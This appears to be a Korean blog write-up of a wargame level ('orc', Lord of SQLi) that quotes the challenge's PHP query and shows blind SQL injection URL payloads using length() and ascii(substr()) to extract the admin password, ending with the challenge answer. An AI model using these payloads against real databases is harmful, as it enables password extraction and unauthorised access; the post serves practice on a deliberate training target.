4번 문제
쿼리문이 2개 쓰인 문제이다
$_GET[pw] = addslashes($_GET[pw]);
$query = "select pw from prob_orc where id='admin' and pw='{$_GET[pw]}'";
보이는 쿼리문에서는 GET[pw] 가 addslashes 로 묶여 버려서 우회가 "절대" 불가능하다
$query = "select id from prob_orc where id='admin' and pw='{$_GET[pw]}'";
이걸 우회해야 답을 풀수 있다.
if(($result['pw']) && ($result['pw'] == $_GET['pw'])) solve("orc");
위 문장을 보면 pw가 값이 입력되야 풀리는걸 볼수있는데
즉 id는 admin 이고 그에 맞는 비밀번호를 구해야한다
https://los.eagle-jump.org/orc_47190a4d33f675a601f8def32df2583a.php?pw='or id='admin' and length(pw)<9 %23
이렇게 pw의 개수를 참 거짓이 출력되는 화면을 보고 구하고
https://los.eagle-jump.org/orc_47190a4d33f675a601f8def32df2583a.php?pw='or id='admin' and ascii(substr((pw),1,1))<100 %23
아스키 값을 입력하여 값을 하나하나 구해준다
총 길이는 8
답:295d5844
'WARGAME > LOS' 카테고리의 다른 글
| [LOS] 6번 문제-darkelf (0) | 2017.12.09 |
|---|---|
| [LOS] 5번 문제-wolfman (0) | 2017.12.09 |
| [LOS] 3번 문제-goblin (0) | 2017.12.08 |
| [LOS] 2번 문제-cobolt (0) | 2017.12.08 |
| [LOS] 1번 문제-gremlin (0) | 2017.12.08 |